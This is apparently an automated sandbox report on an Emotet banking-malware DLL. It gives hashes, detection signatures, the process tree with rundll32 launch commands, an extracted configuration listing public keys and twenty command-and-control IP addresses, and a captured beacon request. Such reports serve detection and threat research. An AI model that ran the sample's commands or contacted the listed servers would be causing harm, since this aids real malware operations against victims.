Play interactive tour

Edit tour

Windows Analysis Report dUGnMYeP1C

Overview

General Information

Sample Name:	dUGnMYeP1C (renamed file extension from none to dll)
Analysis ID:	524858
MD5:	9369750d8d21d8fcb1b35365f232625f
SHA1:	30902a381e823450780e0efbbdc4d4130a032e20
SHA256:	8d91807aa27ee93694388b7cbfa9d74a3d93407036650cdd29631360b675853f
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Multi AV Scanner detection for domain / URL

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6480 cmdline: loaddll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6492 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6468 cmdline: rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6508 cmdline: rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1320 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau",grPefdKmoEDD MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Syakyqcviop\airusfmukngvit.rau",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6544 cmdline: rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 3040 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6564 cmdline: rundll32.exe C:\Users\user\Desktop\dUGnMYeP1C.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4596 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1848 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4936 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.728810783.0000000003565000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.777849090.000000000324A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.765628478.000000000166D000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.765555837.000000000089A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.726530504.00000000009CA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000006.00000002.753626316.000000000079A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000E.00000002.1180916673.00000000035CA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
6.2.rundll32.exe.7b43e8.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.9e4140.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.8b4350.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3264268.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.8b4350.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
6.2.rundll32.exe.7b43e8.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.3264268.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.35e4730.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
3.2.rundll32.exe.9e4140.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
14.2.rundll32.exe.35e4730.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 5 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6468, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\dUGnMYeP1C.dll",Control_RunDLL, ProcessId: 1688

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 6.2.rundll32.exe.7b43e8.0.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: dUGnMYeP1C.dll	Virustotal: Detection: 19%			Perma Link
Source: dUGnMYeP1C.dll	ReversingLabs: Detection: 22%

Multi AV Scanner detection for domain / URL

Show sources

Source: https://51.178.61.60/

Virustotal: Detection: 9%

Perma Link

Source: dUGnMYeP1C.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49763 version: TLS 1.2

Source: dUGnMYeP1C.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E4DD1EE FindFirstFileExA,	0_2_6E4DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E4DD1EE FindFirstFileExA,	2_2_6E4DD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_031E1A80 FindFirstFileW,	14_2_031E1A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.4:49763 -> 51.178.61.60:443

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgU HTTP/1.1Cookie: sbhozJBLsB=GBk0p7+mkeI5rWSXKi9+NkbuDAN7QDaXmyUi/sYe1oQpQspAP+UN+UaybMShDVRbP1B8IvhSKCUHJAYRRtEALN4oFplmYFQ82ingNRD/p7AiYoN6Z4om86TaWhNhyc2E6tH4MfN2LDyXUVu/1idF9te74dCx3ont9eszJJ5RNWPaX46p7K8F+cIzpv+J5OvQCSgHYYgi5GVms5sQuAEbCJ7NsR2cjbUSKQAbd9tLgWFOMQ==Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60

Source: svchost.exe, 00000019.00000003.962071156.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.facebook.com (Facebook)
Source: svchost.exe, 00000019.00000003.962071156.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","A equals www.twitter.com (Twitter)
Source: svchost.exe, 00000019.00000003.962101432.000001FFDD7A0000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000019.00000003.962101432.000001FFDD7A0000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: rundll32.exe, 0000000E.00000003.836491061.0000000003666000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.978146496.000001FFDD700000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000019.00000002.978005532.000001FFDD0EF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 0000000E.00000002.1180973185.000000000361A000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 0000000E.00000002.1181015282.0000000003648000.00000004.00000001.sdmp	String found in binary or memory: https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgU
Source: rundll32.exe, 0000000E.00000002.1180973185.000000000361A000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/InTtBbcviygntftqUxlvTZyNQIlFMYYuphsKApKnjhvMfoEmipIwgUC
Source: svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 00000019.00000003.958307796.000001FFDD7B0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958232168.000001FFDD76D000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.958252571.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 00000019.00000003.959252620.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/
Source: svchost.exe, 00000019.00000003.959264730.000001FFDD7A0000.00000004.00000001.sdmp, svchost.exe, 00000019.00000003.959252620.000001FFDD78F000.00000004.00000001.sdmp	String found in binary or memory: https://www.tiktok.com/legal/report/feedback

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_031F1027 InternetReadFile,

14_2_031F1027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.4:49763 version: TLS 1.2

Source: loaddll32.exe, 00000000.00000002.765596973.000000000164B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E4B5EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode,

0_2_6E4B5EE0

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 6.2.rundll32.exe.7b43e8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.9e4140.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b4350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3264268.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.8b4350.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.7b43e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.3264268.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.35e4730.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.9e4140.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.35e4730.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.728810783.0000000003565000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.777849090.000000000324A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.765628478.000000000166D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.765555837.000000000089A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.726530504.00000000009CA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.753626316.000000000079A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1180916673.00000000035CA000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: dUGnMYeP1C.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Syakyqcviop\airusfmukngvit.rau:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Syakyqcviop\

Jump to behavior
